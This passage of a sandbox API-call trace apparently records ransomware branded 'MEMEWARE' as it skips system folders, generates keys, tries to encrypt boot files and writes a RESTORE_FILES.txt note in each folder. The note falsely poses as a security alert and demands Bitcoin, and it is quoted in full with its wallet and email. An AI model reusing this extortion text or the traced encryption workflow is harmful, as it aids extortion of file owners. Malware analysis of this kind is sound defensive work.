!\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.730] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.730] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.730] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.730] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.730] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.730] CloseHandle (hObject=0xac) returned 1 [0044.731] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.731] lstrcmpiW (lpString1="tr-TR", lpString2="Windows") returned -1 [0044.731] lstrcmpiW (lpString1="tr-TR", lpString2="Program Files") returned 1 [0044.731] lstrcmpiW (lpString1="tr-TR", lpString2="Program Files (x86)") returned 1 [0044.731] lstrcmpiW (lpString1="tr-TR", lpString2="$Recycle.bin") returned 1 [0044.731] lstrcmpiW (lpString1="tr-TR", lpString2="System Volume Information") returned 1 [0044.731] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR") returned 17 [0044.731] lstrcmpW (lpString1="tr-TR", lpString2=".") returned 1 [0044.731] lstrcmpW (lpString1="tr-TR", lpString2="..") returned 1 [0044.731] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\*") returned 19 [0044.731] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.731] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.731] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.731] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.731] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.731] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.731] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\.") returned 19 [0044.731] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.731] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.731] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.731] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.731] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.731] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.731] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.731] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\..") returned 20 [0044.731] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.731] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.731] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.732] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.732] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.732] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.732] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.732] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.732] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 33 [0044.732] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.732] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.732] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.732] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.732] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.732] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.732] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.732] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\RESTORE_FILES.txt") returned 35 [0044.732] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\RESTORE_FILES.txt" (normalized: "c:\\boot\\tr-tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.732] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.732] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.733] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.733] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.733] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.733] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.733] CloseHandle (hObject=0xac) returned 1 [0044.733] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.733] lstrcmpiW (lpString1="zh-CN", lpString2="Windows") returned 1 [0044.733] lstrcmpiW (lpString1="zh-CN", lpString2="Program Files") returned 1 [0044.733] lstrcmpiW (lpString1="zh-CN", lpString2="Program Files (x86)") returned 1 [0044.733] lstrcmpiW (lpString1="zh-CN", lpString2="$Recycle.bin") returned 1 [0044.733] lstrcmpiW (lpString1="zh-CN", lpString2="System Volume Information") returned 1 [0044.733] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN") returned 17 [0044.733] lstrcmpW (lpString1="zh-CN", lpString2=".") returned 1 [0044.733] lstrcmpW (lpString1="zh-CN", lpString2="..") returned 1 [0044.734] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\*") returned 19 [0044.734] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.734] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.734] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.734] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.734] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.734] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.734] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\.") returned 19 [0044.734] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.734] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.734] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.734] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.734] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.734] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.734] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.734] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\..") returned 20 [0044.734] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.734] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.734] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.734] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.734] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.734] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.734] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.734] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.734] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 33 [0044.734] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.734] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.734] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.734] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.734] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.735] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.735] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.735] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\RESTORE_FILES.txt") returned 35 [0044.735] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\RESTORE_FILES.txt" (normalized: "c:\\boot\\zh-cn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.735] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.735] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.736] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.736] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.736] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.736] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.736] CloseHandle (hObject=0xac) returned 1 [0044.736] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.736] lstrcmpiW (lpString1="zh-HK", lpString2="Windows") returned 1 [0044.736] lstrcmpiW (lpString1="zh-HK", lpString2="Program Files") returned 1 [0044.736] lstrcmpiW (lpString1="zh-HK", lpString2="Program Files (x86)") returned 1 [0044.736] lstrcmpiW (lpString1="zh-HK", lpString2="$Recycle.bin") returned 1 [0044.737] lstrcmpiW (lpString1="zh-HK", lpString2="System Volume Information") returned 1 [0044.737] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK") returned 17 [0044.737] lstrcmpW (lpString1="zh-HK", lpString2=".") returned 1 [0044.737] lstrcmpW (lpString1="zh-HK", lpString2="..") returned 1 [0044.737] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\*") returned 19 [0044.737] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.737] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.737] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.737] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.737] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.737] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.737] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\.") returned 19 [0044.737] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.737] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.737] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.737] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.737] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.737] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.737] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.737] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\..") returned 20 [0044.737] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.737] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.737] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.737] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.737] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.737] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.737] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.737] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.737] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 33 [0044.737] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.737] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.737] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.737] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.738] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.738] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.738] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.738] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\RESTORE_FILES.txt") returned 35 [0044.738] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\RESTORE_FILES.txt" (normalized: "c:\\boot\\zh-hk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.738] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.738] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.739] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.739] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: 